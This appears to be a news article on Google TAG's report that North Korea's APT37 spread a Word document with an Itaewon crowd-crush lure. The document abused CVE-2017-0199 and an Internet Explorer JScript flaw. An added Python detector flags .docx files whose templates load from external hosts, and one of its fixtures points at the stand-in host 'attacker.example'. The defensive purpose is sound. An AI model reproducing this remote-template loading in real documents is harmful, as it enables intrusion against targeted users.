There are still a few things that Internet Explorer cannot do that Microsoft’s Edge browser can. Unfortunately, a North Korean government-backed group allegedly exploited one of them this autumn, from deep inside Microsoft Word. According to Google’s Threat Analysis Group (TAG), the government-backed APT37 has previously taken advantage of Internet Explorer’s lingering presence.
APT37 has targeted South Korean journalists, activists, and North Korean defectors with considerable success, using a limited but nonetheless practical Internet Explorer approach.
Visitors to Daily NK, a South Korean website devoted to North Korean news, were the focus of the most recent operation. The lure was the Itaewon Halloween crowd crush, which resulted in at least 151 fatalities. A Microsoft Word .docx document with the title “accident reaction issue” began to circulate; it appeared to be timed and dated less than two days after the event.
Users in South Korea started uploading the document to Google-owned VirusTotal, where it was flagged for the long-known Word and WordPad vulnerability CVE-2017-0199.
As in April 2017, it triggers if you choose to open the document in Word or WordPad outside of “Protected View.”
TAG is a better way to understand the strategies
The document then downloads a rich text template, along with HTML dressed up to resemble an RTF template, from an attacker-controlled site. In what Microsoft refers to as “specially crafted files,” Office and WordPad inherently rely on Internet Explorer to render that HTML, which gives attackers an entry point to deliver a range of malware payloads. The vulnerability was fixed that same month, but exploitation continued; more than a year later, a Petya wave used it as one of its vectors.
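A defender-side check for the document behaviour described above, as an added example that is not part of the original article or of TAG’s tooling: a .docx is a zip of XML parts, and a document that fetches its template from a remote site declares that in a relationship with `TargetMode="External"`. The sample package, its relationship XML and the placeholder URL are all constructed here for illustration.

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# Constructed sample: the attached-template relationship points at an external URL.
# The host is a placeholder, not an indicator from the article.
EXTERNAL_TEMPLATE_RELS = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
    'Target="http://attacker.example/template.dotm" TargetMode="External"/>'
    '</Relationships>'
)

# Constructed benign sample: the same relationship, but the template lives inside the package.
BENIGN_RELS = EXTERNAL_TEMPLATE_RELS.replace(
    'Target="http://attacker.example/template.dotm" TargetMode="External"',
    'Target="template.dotm"',
)

def build_sample_docx(rels_xml: str) -> bytes:
    """Assemble just enough of a .docx (zip of XML parts) to exercise the check."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")            # not parsed by the check
        z.writestr("word/document.xml", "<document/>")           # not parsed by the check
        z.writestr("word/settings.xml", '<settings attachedTemplate="rId1"/>')
        z.writestr("word/_rels/settings.xml.rels", rels_xml)
    return buf.getvalue()

def find_external_targets(docx_bytes: bytes) -> list:
    """Return (part, relationship type, target) for every relationship whose target
    is fetched from outside the package when the document is opened."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode") == "External":
                    rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, rtype, rel.get("Target", "")))
    return hits

def is_suspicious(hit) -> bool:
    """Templates or OLE objects loaded over http(s) are the CVE-2017-0199-style pattern;
    ordinary hyperlinks are also external, so the relationship type matters."""
    _, rtype, target = hit
    return rtype in ("attachedTemplate", "oleObject") and re.match(r"(?i)^https?://", target) is not None
```

Run `find_external_targets` over a suspect file's bytes and pass each hit to `is_suspicious` to triage it before opening the document anywhere near Word.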
The specific vulnerability lies in Internet Explorer’s JScript engine: a mistake in just-in-time optimization results in data type confusion and memory writes. Additionally, this exploit cleaned up after itself by erasing traces of its existence from the Internet Explorer cache and history. Google’s TAG does not know which payloads were delivered.
But APT37 has previously used exploits to deploy BLUELIGHT, ROKRAT, and DOLPHIN, all of which served North Korea’s political and economic objectives.
Even though Microsoft has fixed this particular weakness in its JScript engine, remote-code-execution attacks via Word documents appear to be here to stay, now in their sixth year. And North Korean actors will be happy to keep staging them.
TAG is dedicated to publishing research that educates the security community about threat actors like APT37, and to deepening its own understanding of the tactics and methods these actors use so that safeguards can be raised throughout the ecosystem.